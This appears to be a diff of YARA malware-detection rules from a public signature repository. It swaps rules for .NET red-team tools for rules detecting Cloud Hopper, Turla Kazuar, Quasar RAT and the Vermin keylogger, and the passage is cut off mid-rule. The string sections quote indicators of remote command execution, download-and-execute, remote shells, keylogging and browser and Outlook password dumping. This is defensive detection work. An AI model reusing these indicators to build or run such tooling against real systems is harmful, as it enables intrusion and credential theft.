-		reference = "http://blog.jpcert.or.jp/2018/03/malware-tscooki-7aa0.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_tscookie_rat.yar#L13-L32"
+		reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cloudhopper.yar#L170-L189"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c6121c541a77219b17351787973a4bc06a8d941ebd5f9e5e1e14ad4740a3fe7b"
+		logic_hash = "a27b041a1ff0fae3d06d8050fe3207435cb84f421099dc1cad8f8a503e976860"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2bd13d63797864a70b775bd1994016f5052dc8fd1fd83ce1c13234b5d304330d"
+		hash1 = "19aa5019f3c00211182b2a80dd9675721dac7cfb31d174436d3b8ec9f97d898b"
+		hash2 = "5cebc133ae3b6afee27beb7d3cdb5f3d675c3f12b7204531f453e99acdaa87b1"
 
 	strings:
-		$x1 = "[-] DecryptPassword_Outlook failed(err=%d)" fullword ascii
-		$x2 = "----------------------- Firefox Passwords ------------------" fullword ascii
-		$x3 = "--------------- Outlook Passwords ------------------" fullword ascii
-		$x4 = "----------------------- IE Passwords ------------------" fullword ascii
+		$s1 = "WSHELL32.dll" fullword wide
+		$s2 = "operator \"\" " fullword ascii
+		$s3 = "\" /t REG_SZ /d \"" fullword wide
+		$s4 = " /f /v \"" fullword wide
+		$s5 = "zok]\\\\\\ZZYYY666564444" fullword ascii
+		$s6 = "AFX_DIALOG_LAYOUT" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( ( pe.exports ( "DoWork" ) and pe.exports ( "PrintF" ) ) or 1 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 900KB and 4 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Fakefilemaker : FILE
+rule SIGNATURE_BASE_Opcloudhopper_Malware_9 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "2c87114f-5295-583f-b567-623d478ce0eb"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/DamonMohammadbagher/FakeFileMaker"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L3-L16"
+		description = "Detects malware from Operation Cloud Hopper"
+		author = "Florian Roth (Nextron Systems)"
+		id = "5a02f2ac-905d-550a-bde0-cfde6ed1a4ab"
+		date = "2017-04-03"
+		modified = "2023-12-05"
+		reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cloudhopper.yar#L191-L205"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "27d402835f31b6383c837e90248ae5c6d22f4c267d52625ebfbcc2ee5099ccad"
+		logic_hash = "f45159a508ce8ccb5ab57c7347916642f58ab1b6e0a8886ba53e4810ed65c5c1"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "f0002b912135bcee83f901715002514fdc89b5b8ed7585e07e482331e4a56c06"
 
 	strings:
-		$name = "FakeFileMaker" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$s1 = "MsMpEng.exe" fullword ascii
+		$op0 = { 2b c7 50 e8 22 83 ff ff ff b6 c0 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Wmipersistence : FILE
+rule SIGNATURE_BASE_Opcloudhopper_Malware_10 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "7a674596-c697-569d-a16c-3cefe4ff752a"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/mdsecactivebreach/WMIPersistence"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L18-L31"
+		description = "Detects malware from Operation Cloud Hopper"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a5d3237e-d6db-54ba-bfa6-f642f8096819"
+		date = "2017-04-03"
+		modified = "2023-12-05"
+		reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cloudhopper.yar#L207-L222"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f8f5e1b6d9b9e8e2f76a7e02385142bbeb755d1b1e41e501f4f74fcaba0a7dad"
+		logic_hash = "538754e6daadd3efa3e77723dce7143fecad28cf94caa1b29a2d45df44b14ee4"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "5b4028728d8011a2003b7ce6b9ec663dd6a60b7adcc20e2125da318e2d9e13f4"
 
 	strings:
-		$name = "WMIPersistence" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$x1 = "bakshell.EXE" fullword wide
+		$s19 = "bakshell Applicazione MFC" fullword wide
+		$op0 = { 83 c4 34 c3 57 8b ce e8 92 18 00 00 68 20 70 40 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_Adcollector_Sep22_1 : FILE
+rule SIGNATURE_BASE_Opcloudhopper_Malware_11 : FILE
 {
 	meta:
-		description = "Detects ADCollector Tool - a lightweight tool to quickly extract valuable information from the Active Directory environment for both attacking and defending"
+		description = "Detects malware from Operation Cloud Hopper"
 		author = "Florian Roth (Nextron Systems)"
-		id = "48b376e4-752b-523e-b34e-65b6944c33fb"
-		date = "2022-09-15"
-		modified = "2024-12-10"
-		reference = "https://github.com/dev-2null/ADCollector"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L55-L75"
+		id = "18bd2fa9-7eca-5dbc-8e79-953800d5bb0a"
+		date = "2017-04-03"
+		modified = "2023-12-05"
+		reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cloudhopper.yar#L224-L240"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "66d5363e885378c442e7532f69d4c36618d7a0f5dbe67490631d1ed5078d3fba"
+		logic_hash = "7935d3aeef0d4c94a00dd44942a1ba97d0c9fce848914ebc9c59d9f8e9f51599"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "241390219a0a773463601ca68b77af97453c20af00a66492a7a78c04d481d338"
-		hash2 = "cc086eb7316e68661e3d547b414890d5029c5cc460134d8b628f4b0be7f27fb3"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a80f6c57f772f20d63021c8971a280c19e8eafe7cc7088344c598d84026dda15"
 
 	strings:
-		$x1 = "ADCollector.exe --SPNs --Term key --Acls 'CN=Domain Admins,CN=Users,DC=lab,DC=local'" wide fullword
-		$s1 = "ADCollector.exe" wide fullword
-		$s2 = "ENCRYPTED_TEXT_PASSWORD_ALLOWED" ascii fullword
-		$s3 = "\\Policies\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\MACHINE\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf" wide
-		$s4 = "[-] Password Does Not Expire Accounts:" wide
-		$s5 = "  * runAs:       {0}" wide fullword
+		$x1 = "IOGVWDWCXZVRHTE" fullword ascii
+		$op1 = { c9 c3 56 6a 00 8b f1 6a 64 e8 dd 34 00 00 c7 06 }
+		$op2 = { 68 38 00 41 00 68 34 00 41 00 e8 d3 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( 1 of ( $x* ) or 3 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Maliciousclickoncegenerator : FILE
+rule SIGNATURE_BASE_Opcloudhopper_Lockdown : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "683af3b4-4c91-5ff3-96bf-d5c1d9c19cc2"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/Mr-Un1k0d3r/MaliciousClickOnceGenerator"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L77-L90"
+		description = "Tools related to Operation Cloud Hopper"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0500f19c-597b-5904-8401-35236215ff29"
+		date = "2017-04-07"
+		modified = "2023-12-05"
+		reference = "https://github.com/maaaaz/impacket-examples-windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cloudhopper.yar#L251-L265"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "91e5878d49ad9af5420d4e29afaa600337fb8051951598a997cd74d72c884206"
+		logic_hash = "3f24c08817bc94bb4b7d09d51bed62f43952f2c66338f29c4bc8e9000b3ff78a"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "8ca61cef74573d9c1d19b8191c23cbd2b7a1195a74eaba037377e5ee232b1dc5"
 
 	strings:
-		$name = "MaliciousClickOnceGenerator" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$s1 = "lockdown.dll" fullword ascii
+		$s3 = "mfeann.exe" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Directinjectorpoc : FILE
+rule SIGNATURE_BASE_Opcloudhopper_Windowxarbot : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "d9a430d7-b062-554b-aff4-cfd98d91e9fe"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/badBounty/directInjectorPOC"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L92-L105"
+		description = "Malware related to Operation Cloud Hopper"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4434632a-1886-5e8b-a205-12220263980a"
+		date = "2017-04-07"
+		modified = "2023-12-05"
+		reference = "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cloudhopper.yar#L267-L279"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ffdc5694668af6c82b493403373d2e2e915e45bca8d58ec1ab41c5a8bd28d781"
+		logic_hash = "5d8a9c25032c5371e843f8e80884e43a64c73b1644605b39b2dff11104c3bbcd"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "directInjectorPOC" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$s1 = "\\Release\\WindowXarbot.pdb" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Asstrongasfuck : FILE
+rule SIGNATURE_BASE_Opcloudhopper_Wmidll_Inmemory
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "4c63c8a2-5889-5177-9f66-8e5f755025a3"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/Charterino/AsStrongAsFuck"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L107-L120"
+		description = "Malware related to Operation Cloud Hopper - Page 25"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0afb6e52-bc9a-5a68-890b-79a017e5d554"
+		date = "2017-04-07"
+		modified = "2023-12-05"
+		reference = "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cloudhopper.yar#L281-L293"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4765f2099bf8fa8ebccd8cdcc561354f4aeba28c2473fd8556f1ef1d5d28dadd"
+		logic_hash = "6dddda4e519eeaa67eb4c21151cab10553420a23a077751e0fc45fcae0bf6e69"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "AsStrongAsFuck" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$s1 = "wmi.dll 2>&1" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Magentoscanner : FILE
+rule SIGNATURE_BASE_VBS_Wmiexec_Tool_Apr17_1 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "db3912bd-574c-57e2-a9b6-4b440d144471"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/soufianetahiri/MagentoScanner"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L122-L135"
+		description = "Tools related to Operation Cloud Hopper"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8175eb74-38f1-5d8f-a668-aa8e215b032e"
+		date = "2017-04-07"
+		modified = "2023-12-05"
+		reference = "https://github.com/maaaaz/impacket-examples-windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cloudhopper.yar#L295-L318"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "245dce3be07c8e84dfcd2cdb2d9f24406a9b11b437e74969f1472a6ee149fd9c"
+		logic_hash = "b0aad1c8dfc07ae3df835ae113bd02abfd706a0646ffcac5dd5691822016d31a"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "21bc328ed8ae81151e7537c27c0d6df6d47ba8909aebd61333e32155d01f3b11"
 
 	strings:
-		$name = "MagentoScanner" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$x1 = "strNetUse = \"cmd.exe /c net use \\\\\" & host" fullword ascii
+		$x2 = "localcmd = \"cmd.exe /c \" & command " ascii
+		$x3 = "& \" > \" & TempFile & \" 2>&1\"  '2>&1 err" fullword ascii
+		$x4 = "strExec = \"cmd.exe /c \" & cmd & \" >> \" & resultfile & \" 2>&1\"  '2>&1 err" fullword ascii
+		$x5 = "TempFile = objShell.ExpandEnvironmentStrings(\"%TEMP%\") & \"\\wmi.dll\"" fullword ascii
+		$a1 = "WMIEXEC ERROR: Command -> " ascii
+		$a2 = "WMIEXEC : Command result will output to" fullword ascii
+		$a3 = "WMIEXEC : Target ->" fullword ascii
+		$a4 = "WMIEXEC : Login -> OK" fullword ascii
+		$a5 = "WMIEXEC : Process created. PID:" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( filesize < 40KB and 1 of them ) or 3 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Revengerat_Stub_Cssharp : FILE
+
+rule SIGNATURE_BASE_Apt_RU_Turla_Kazuar_Debugview_Pefeatures : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "06dce4f9-4d7a-5976-a87a-07c539e5dbe8"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/NYAN-x-CAT/RevengeRAT-Stub-CSsharp"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L137-L150"
+		description = "Turla mimicking SysInternals Tools- peFeatures"
+		author = "JAG-S"
+		id = "0a1675c0-8645-5288-9ef6-e68ffbfe0c3b"
+		date = "2020-05-28"
+		modified = "2023-12-05"
+		reference = "https://www.epicturla.com/blog/sysinturla"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turla_kazuar.yar#L15-L59"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a3bd1f8e52e6ed468b6a4fea83456ca813b69e2d676dfab687bbea5a746fed3c"
-		score = 75
+		logic_hash = "10c2e47e5c1885c7dc19d1fb7933c9b15911cbe4c6fba99b7f763738ae934126"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-
-	strings:
-		$name = "RevengeRAT-Stub-CSsharp" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		version = "2.0"
+		hash1 = "1749c96cc1a4beb9ad4d6e037e40902fac31042fa40152f1d3794f49ed1a2b5c"
+		hash2 = "44cc7f6c2b664f15b499c7d07c78c110861d2cc82787ddaad28a5af8efc3daac"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		uint16( 0 ) == 0x5a4d and ( pe.version_info [ "LegalCopyright" ] == "Test Copyright" and ( ( pe.version_info [ "ProductName" ] == "Sysinternals DebugView" and pe.version_info [ "Description" ] == "Sysinternals DebugView" ) or ( pe.version_info [ "FileVersion" ] == "4.80.0.0" and pe.version_info [ "Comments" ] == "Sysinternals DebugView" ) or ( pe.version_info [ "OriginalName" ] contains "DebugView.exe" and pe.version_info [ "InternalName" ] contains "DebugView.exe" ) or ( pe.version_info [ "OriginalName" ] == "Agent.exe" and pe.version_info [ "InternalName" ] == "Agent.exe" ) ) )
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Sharpyshell : FILE
+rule SIGNATURE_BASE_APT_MAL_RU_Turla_Kazuar_May20_1 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "3069c5eb-446e-5bfa-9df0-2e03f229d4d1"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/antonioCoco/SharPyShell"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L152-L165"
+		description = "Detects Turla Kazuar malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "cd0d1fa2-5303-55f8-90a7-4a699ec79230"
+		date = "2020-05-28"
+		modified = "2023-12-05"
+		reference = "https://www.epicturla.com/blog/sysinturla"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turla_kazuar.yar#L61-L81"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "89d0010c08349f8982c7f5aa5f7855702556ce10f9f3b5b18b61349c5233e001"
+		logic_hash = "547ed3cd88057ab91a0804ecf515eacca04fcf6e490aed1ee0f6a26c3d6b8268"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "1749c96cc1a4beb9ad4d6e037e40902fac31042fa40152f1d3794f49ed1a2b5c"
+		hash2 = "1fca5f41211c800830c5f5c3e355d31a05e4c702401a61f11e25387e25eeb7fa"
+		hash3 = "2d8151dabf891cf743e67c6f9765ee79884d024b10d265119873b0967a09b20f"
+		hash4 = "44cc7f6c2b664f15b499c7d07c78c110861d2cc82787ddaad28a5af8efc3daac"
 
 	strings:
-		$name = "SharPyShell" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$s1 = "Sysinternals" ascii fullword
+		$s2 = "Test Copyright" wide fullword
+		$op1 = { 0d 01 00 08 34 2e 38 30 2e 30 2e 30 00 00 13 01 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Ghostloader : FILE
+rule SIGNATURE_BASE_Quasar_RAT_Jan18_1 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "d8d88f3f-f250-55ff-88a6-4623e12ef89d"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/TheWover/GhostLoader"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L167-L180"
+		description = "Detects Quasar RAT"
+		author = "Florian Roth (Nextron Systems)"
+		id = "52408897-bfec-5726-9d01-6ff982d50c28"
+		date = "2018-01-29"
+		modified = "2023-12-05"
+		reference = "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_quasar_vermin.yar#L11-L33"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "91527b4b35f2bb1aeee236647c5169c67f2b9cfb867f2b6d486bd8d8b7455d4b"
+		logic_hash = "4b2c8695a053a714e97f3e108f0f359d9e49151297a21e460b3201d8f4e72a89"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6"
+		hash2 = "24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18"
 
 	strings:
-		$name = "GhostLoader" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$a1 = "ping -n 20 localhost > nul" fullword wide
+		$s2 = "HandleDownloadAndExecuteCommand" fullword ascii
+		$s3 = "DownloadAndExecute" fullword ascii
+		$s4 = "UploadAndExecute" fullword ascii
+		$s5 = "ShellCommandResponse" fullword ascii
+		$s6 = "Select * From Win32_ComputerSystem" fullword wide
+		$s7 = "Process could not be started!" fullword wide
+		$s8 = ".Core.RemoteShell" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 600KB and $a1 and 3 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Dotnetinject : FILE
+rule SIGNATURE_BASE_Vermin_Keylogger_Jan18_1 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "468f89c4-5b94-53be-b9e6-ad21de7d98ba"
-		date = "2021-01-22"
-		modified = "2022-06-28"
-		reference = "https://github.com/dtrizna/DotNetInject"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L182-L202"
+		description = "Detects Vermin Keylogger"
+		author = "Florian Roth (Nextron Systems)"
+		id = "52192ea1-bb3d-52da-ba18-0645262745e2"
+		date = "2018-01-29"
+		modified = "2023-12-05"
+		reference = "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_quasar_vermin.yar#L35-L71"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "07ba4ba23372dbc2618dcea89ef643cd68371ace1116bfeb939b0f9adfc425bb"
+		logic_hash = "a8afe017f32400e1e498d23746f5cb59c3c67f6abefe9b2e36bec81ca82ecfed"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d"
+		hash2 = "e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7"
+		hash3 = "0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6"
+		hash4 = "4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da"
+		hash5 = "24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18"
+		hash6 = "2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef"
 
 	strings:
-		$name = "DotNetInject" ascii wide
-		$compile = "AssemblyTitle" ascii wide
-		$fp1 = "GetDotNetInjector" ascii
-		$fp2 = "JetBrains.TeamCity.Injector." wide
+		$x1 = "_keyloggerTaskDescription" ascii
+		$x2 = "_keyloggerTaskAuthor" ascii
+		$x3 = "GetKeyloggerLogsResponse" fullword ascii
+		$x4 = "GetKeyloggerLogs" fullword ascii
+		$x5 = "ExecuteUninstallKeyLoggerTask" fullword ascii
+		$x6 = "ExecuteInstallKeyLoggerTask" fullword ascii
+		$x7 = ":\\Projects\\Vermin\\KeyboardHookLib\\" ascii
+		$x8 = ":\\Projects\\Vermin\\CryptoLib\\" ascii
+		$s1 = "<RunHidden>k__BackingField" fullword ascii
+		$s2 = "set_SystemInfos" fullword ascii
+		$s3 = "set_RunHidden" fullword ascii
+		$s4 = "set_RemotePath" fullword ascii
+		$s5 = "ExecuteShellCommandTask" fullword ascii
+		$s6 = "Client.exe" fullword wide
+		$s7 = "xClient.Core.ReverseProxy.Packets" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and filesize < 20MB and $name and $compile and not 1 of ( $fp* )
+		uint16( 0 ) == 0x5a4d and filesize < 800KB and ( 1 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Atpminidump : FILE
+rule SIGNATURE_BASE_SUSP_MAL_EXFIL_Stealer_Output_Characteristics_Sep22_1 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "97981569-fe94-5600-8319-946edb4265e7"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/b4rtik/ATPMiniDump"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L204-L217"
+		description = "Detects typical stealer output files as created by RedLine or Racoon stealer"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c1cab3c3-c4f3-5a19-9ea3-9e4242238359"
+		date = "2022-09-17"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/cglyer/status/1570965878480719873"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_stealer_exfil_zip.yar#L2-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7498ed5d11b9c3646ebd2d1330a239c43e9c5b270b1778871c2821a2fefb5137"
-		score = 75
+		logic_hash = "197bb4b837cdd635f9340547b10a90c3a2a17f0113076c5ccbc0a91b7ae18eeb"
+		score = 70
 		quality = 85
 		tags = "FILE"
